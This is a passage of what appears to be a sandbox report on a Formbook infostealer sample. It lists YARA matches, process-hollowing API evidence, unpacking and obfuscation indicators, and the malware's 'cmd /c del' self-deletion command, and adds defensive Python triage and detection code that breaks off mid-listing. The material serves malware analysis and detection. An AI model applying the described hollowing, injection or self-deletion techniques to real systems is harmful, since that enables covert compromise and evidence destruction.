Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_028530C0
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02856150
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_028530B2
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_028514FA
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02851448
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02851458
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02850D88
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02850D98
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02852DD7
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_02852DE8
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E847B0
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8804C
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8BF38
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8EACB
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E847A3
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8A100
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E88104
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00401030
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00401174
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041B9BD
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041BA6D
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041C31E
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041CB97
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00408C60
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00402D87
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00402D90
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041C597
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041C77C
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041BFCB
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041B7E3
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00402FB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369EBB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03686E30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03731D55
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03660D20
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03684120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366F900
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721002
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367841F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367B090
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088CB97
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_00878C60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_00872D87
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_00872D90
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088C597
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_00872FB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088B7E3
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088C77C
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0366B150 appears 32 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_004181C0 NtCreateFile
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00418270 NtReadFile
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_004182F0 NtClose
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_004183A0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041826A NtReadFile
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041839A NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9650 NtQueryValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9A50 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A96E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A96D0 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9540 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A95D0 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A99A0 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9840 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9760 NtOpenProcess
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9770 NtSetInformationFile
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036AA770 NtOpenThread, 13_2_036AA770
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9730 NtQueryVirtualMemory, 13_2_036A9730
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9B00 NtSetValueKey, 13_2_036A9B00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036AA710 NtOpenProcessToken, 13_2_036AA710
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A97A0 NtUnmapViewOfSection, 13_2_036A97A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036AA3B0 NtGetContextThread, 13_2_036AA3B0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9670 NtQueryInformationProcess, 13_2_036A9670
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9A20 NtResumeThread, 13_2_036A9A20
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9A00 NtProtectVirtualMemory, 13_2_036A9A00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9610 NtEnumerateValueKey, 13_2_036A9610
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9A10 NtQuerySection, 13_2_036A9A10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9A80 NtOpenDirectoryObject, 13_2_036A9A80
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9560 NtWriteFile, 13_2_036A9560
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9950 NtQueueApcThread, 13_2_036A9950
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9520 NtWaitForSingleObject, 13_2_036A9520
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036AAD30 NtSetContextThread, 13_2_036AAD30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A95F0 NtQueryInformationFile, 13_2_036A95F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A99D0 NtCreateProcessEx, 13_2_036A99D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036AB040 NtSuspendThread, 13_2_036AB040
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9820 NtEnumerateKey, 13_2_036A9820
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A98F0 NtReadVirtualMemory, 13_2_036A98F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A98A0 NtWriteVirtualMemory, 13_2_036A98A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_008881C0 NtCreateFile, 13_2_008881C0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_008882F0 NtClose, 13_2_008882F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_00888270 NtReadFile, 13_2_00888270
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_008883A0 NtAllocateVirtualMemory, 13_2_008883A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088826A NtReadFile, 13_2_0088826A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088839A NtAllocateVirtualMemory, 13_2_0088839A
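
The Nt* resolution list above is the raw evidence behind the "Sample uses process hollowing technique", "Maps a DLL or memory area into another process", "Queues an APC in another process" and "Modifies the context of a thread in another process" signatures in the overview: WWAHost.exe (process index 13) resolves NtOpenProcess/NtCreateProcessEx, NtUnmapViewOfSection, NtCreateSection/NtMapViewOfSection, NtWriteVirtualMemory and NtQueueApcThread/NtSetContextThread/NtResumeThread, while the second scan files 15-9-21.exe instance (index 2) only resolves file and memory-allocation calls. The Python below is an added triage example, not Joe Sandbox code: it parses "Code function" lines into per-process API sets and checks them against a hollowing-stage grouping that is the author's own heuristic; the sample input is a constructed subset of the lines above.

```python
"""Triage Joe Sandbox 'Code function' lines for process-hollowing primitives.

Added example for this report; it is not Joe Sandbox code. The grouping of
Nt* calls into injection stages is the author's own heuristic (assumption).
"""
from collections import defaultdict

# Stages of a process-hollowing / thread-hijack chain, keyed by the native
# API that implements each stage. Assumption: a triage heuristic, not a taxonomy.
STAGES = {
    "target":  {"NtOpenProcess", "NtCreateProcessEx", "NtOpenThread",
                "NtSuspendThread", "NtGetContextThread"},
    "unmap":   {"NtUnmapViewOfSection"},
    "map":     {"NtAllocateVirtualMemory", "NtCreateSection", "NtMapViewOfSection"},
    "write":   {"NtWriteVirtualMemory"},
    "execute": {"NtQueueApcThread", "NtSetContextThread", "NtResumeThread"},
}
# Hollowing needs every stage; plain remote injection needs a target plus
# write and execute but no unmap of the host image.
HOLLOWING = {"target", "unmap", "map", "write", "execute"}
INJECTION = {"target", "write", "execute"}


def parse_line(line):
    """Return (process_index, image, [api, ...]) for one evidence line, or None.

    Lines look like:
      Source: C:\\...\\WWAHost.exe Code function: 13_2_036A97A0 NtUnmapViewOfSection, 13_2_036A97A0
    The process index is the first field of the 'N_M_ADDR' token; lines with
    no API names between the two address tokens are skipped.
    """
    marker = " Code function: "
    if not line.startswith("Source: ") or marker not in line:
        return None
    image, rest = line[len("Source: "):].split(marker, 1)
    tokens = rest.split()
    if len(tokens) < 3:
        return None  # bare 'ADDR ADDR' line: no resolved API names
    process_index = tokens[0].split("_", 1)[0]
    apis = [a for a in tokens[1].split(",") if a]
    return process_index, image, apis


def triage(lines):
    """Group resolved APIs per process index and assign an injection verdict."""
    per_process = defaultdict(lambda: {"image": None, "apis": set()})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        process_index, image, apis = parsed
        per_process[process_index]["image"] = image
        per_process[process_index]["apis"].update(apis)

    report = {}
    for process_index, info in per_process.items():
        stages = {name for name, apis in STAGES.items() if info["apis"] & apis}
        if HOLLOWING <= stages:
            verdict = "process hollowing chain complete"
        elif INJECTION <= stages:
            verdict = "remote code injection primitives present"
        else:
            verdict = "no injection chain"
        report[process_index] = {"image": info["image"], "apis": sorted(info["apis"]),
                                 "stages": sorted(stages), "verdict": verdict}
    return report


# Constructed input: a subset of the evidence lines from this report.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_004181C0 NtCreateFile, 2_2_004181C0",
    r"Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00418270 NtReadFile, 2_2_00418270",
    r"Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_004183A0 NtAllocateVirtualMemory, 2_2_004183A0",
    r"Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03684120 13_2_03684120",
    r"Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9780 NtMapViewOfSection,LdrInitializeThunk, 13_2_036A9780",
    r"Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A99A0 NtCreateSection,LdrInitializeThunk, 13_2_036A99A0",
    r"Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9760 NtOpenProcess, 13_2_036A9760",
    r"Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A97A0 NtUnmapViewOfSection, 13_2_036A97A0",
    r"Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036AA3B0 NtGetContextThread, 13_2_036AA3B0",
    r"Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9A20 NtResumeThread, 13_2_036A9A20",
    r"Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A9950 NtQueueApcThread, 13_2_036A9950",
    r"Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036AAD30 NtSetContextThread, 13_2_036AAD30",
    r"Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A99D0 NtCreateProcessEx, 13_2_036A99D0",
    r"Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A98A0 NtWriteVirtualMemory, 13_2_036A98A0",
]

if __name__ == "__main__":
    for process_index, info in sorted(triage(SAMPLE_LINES).items()):
        print(process_index, info["image"], "->", info["verdict"], info["stages"])
```

Feed it the full "Contains functionality to call native functions" block of a report and it separates the hollowed host (every stage present) from the dropper stages that only touch files and their own memory.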
Sample file is different than original file name gathered from version info
Source: scan files 15-9-21.exe, 00000000.00000002.263517285.0000000005A70000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe, 00000000.00000002.262075156.0000000002987000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameEnvoySinks.dll6 vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe, 00000000.00000002.261491768.000000000060E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIObserv.exe4 vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWWAHost.exej% vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe, 00000002.00000000.260672638.000000000105E000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIObserv.exe4 vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe, 00000002.00000002.343331105.0000000001BDF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe Binary or memory string: OriginalFilenameIObserv.exe4 vs scan files 15-9-21.exe
Source: scan files 15-9-21.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: scan files 15-9-21.exe Virustotal: Detection: 29%
Source: scan files 15-9-21.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\scan files 15-9-21.exe 'C:\Users\user\Desktop\scan files 15-9-21.exe'
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process created: C:\Users\user\Desktop\scan files 15-9-21.exe C:\Users\user\Desktop\scan files 15-9-21.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\scan files 15-9-21.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\scan files 15-9-21.exe.log
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@10/4
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2752:120:WilError_01
Source: scan files 15-9-21.exe, Forms/mainForm.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.0.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.2.scan files 15-9-21.exe.fd0000.1.unpack, Forms/mainForm.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.0.scan files 15-9-21.exe.fd0000.0.unpack, Forms/mainForm.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\scan files 15-9-21.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: scan files 15-9-21.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: scan files 15-9-21.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: scan files 15-9-21.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: WWAHost.pdb source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp
Source: Binary string: WWAHost.pdbUGP source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: scan files 15-9-21.exe, 00000002.00000002.343119287.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe, 0000000D.00000002.525382273.0000000003640000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: scan files 15-9-21.exe, 00000002.00000002.343119287.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe

Data Obfuscation:

.NET source code contains potential unpacker
Source: scan files 15-9-21.exe, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.scan files 15-9-21.exe.fd0000.1.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.scan files 15-9-21.exe.fd0000.0.unpack, Forms/mainForm.cs .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8E622 push 0000001Ah; retf 0_2_04E8E624
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8D131 push 0000001Ah; retf 0_2_04E8D133
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8E8E8 push 0000001Ah; retf 0_2_04E8E907
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 0_2_04E8EA5C push 0000001Ah; retf 0_2_04E8EA5E
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041C949 push ecx; ret 2_2_0041C91E
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0040429D pushfd ; iretd 2_2_0040429E
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041B3B5 push eax; ret 2_2_0041B408
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041B46C push eax; ret 2_2_0041B472
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041B402 push eax; ret 2_2_0041B408
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_0041B40B push eax; ret 2_2_0041B472
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036BD0D1 push ecx; ret 13_2_036BD0E4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088C949 push ecx; ret 13_2_0088C91E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0087429D pushfd ; iretd 13_2_0087429E
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088B3B5 push eax; ret 13_2_0088B408
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088B40B push eax; ret 13_2_0088B472
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088B402 push eax; ret 13_2_0088B408
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0088B46C push eax; ret 13_2_0088B472
Binary contains a suspicious time stamp
Source: scan files 15-9-21.exe Static PE information: 0xEB59C8A3 [Mon Feb 14 13:50:27 2095 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.20919367006
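
A link time of Feb 2095 (0xEB59C8A3) lies some 74 years after the analysis date, so the field was written by the packer or a post-build tool rather than by the compiler, and a .text entropy of 7.21 bits per byte is well above what plain CIL or x86 code produces, consistent with the encrypted payload that the Assembly.Load(byte[]) unpacker above decrypts. Both checks are cheap to reproduce offline. The Python below is an added example, not Joe Sandbox code: it reads the COFF TimeDateStamp from a PE header, flags stamps after the analysis clock or before 1990, and computes Shannon entropy. The minimal PE header it builds is constructed for the demonstration, only the stamp value 0xEB59C8A3 comes from the report, and the 1990 lower bound is an arbitrary choice.

```python
"""Decode a PE TimeDateStamp and measure section entropy.

Added example for this report, not Joe Sandbox code. build_min_pe() creates a
constructed header just large enough for the parser; only the stamp value
0xEB59C8A3 comes from the report. The 1990 lower bound is an arbitrary choice.
"""
import math
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def unix_to_utc(seconds):
    """Epoch seconds to an aware UTC datetime. timedelta arithmetic avoids the
    platform range limits of datetime.fromtimestamp() for far-future values."""
    return EPOCH + timedelta(seconds=seconds)


def pe_timestamp(image):
    """COFF TimeDateStamp of a PE image as a UTC datetime.

    Layout: e_lfanew is the dword at DOS-header offset 0x3C; 'PE\\0\\0' sits at
    e_lfanew; the 20-byte COFF file header follows, with TimeDateStamp at COFF
    offset 4, i.e. image offset e_lfanew + 8.
    """
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    (stamp,) = struct.unpack_from("<I", image, e_lfanew + 8)
    return unix_to_utc(stamp)


def timestamp_is_suspicious(stamp_dt, analysis_dt):
    """A link time after the analysis clock, or before 1990, cannot be genuine.
    Packers randomise or zero the field, so treat this as an indicator, not proof."""
    return stamp_dt > analysis_dt or stamp_dt.year < 1990


def shannon_entropy(data):
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly random bytes.
    Compiled x86 or CIL usually lands around 5.5-6.5; packed or encrypted
    payloads sit above ~7.0, which is where this sample's .text (7.21) is."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def build_min_pe(stamp):
    """Constructed minimal image: 0x40-byte DOS header with e_lfanew=0x40,
    then the PE signature and a COFF header carrying the given TimeDateStamp."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x014C, 3, stamp, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    ts = pe_timestamp(build_min_pe(0xEB59C8A3))
    now = datetime.now(timezone.utc)
    print(ts.strftime("%a %b %d %H:%M:%S %Y UTC"), "suspicious:",
          timestamp_is_suspicious(ts, now))
    print("entropy(uniform 0..255):", round(shannon_entropy(bytes(range(256))), 3))
```

Run shannon_entropy() over each section's raw bytes of a real file (pefile or a hand-rolled section-table walk gives the slices) and compare against the 7.21 reported here; a .NET assembly whose .text scores that high is carrying a blob, not code.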

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe'
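
The deleting process here is WWAHost.exe, a Windows binary that explorer.exe launched and that is not in the ancestry of the original sample (the sample's code reached explorer.exe by injection first, see the process tree above), so a rule that only looks for "cmd /c del <own image>" spawned by the sample itself misses this chain. The Python below is an added detection example, not Joe Sandbox code: it walks process lineage from each cmd.exe deletion, raises the classic self-deletion alert when the deleted path is an ancestor's image, and a second alert when a System32/SysWOW64 binary deletes an executable under a user-writable path. The event records, their pid/ppid numbers and the field names are constructed to mirror the process-creation lines above and are not a specific EDR schema.

```python
"""Detect 'cmd /c del <file>' self-deletion from process-creation events.

Added example for this report, not Joe Sandbox code. EVENTS mirrors the
process tree shown above; the pid/ppid numbers and the field names are
constructed and are not from the report or any particular EDR schema.
"""
import re

# cmd.exe deletion: optional 'cmd.exe' prefix, /c, del or erase, optional
# switches, then the path with or without quotes (Joe Sandbox prints single
# quotes where cmd.exe would have had double quotes).
DEL_RE = re.compile(
    r'''/c\s+(?:del|erase)\s+(?:/[a-z]\s+)*["']?(?P<target>[^"']+?)["']?\s*$''',
    re.IGNORECASE,
)
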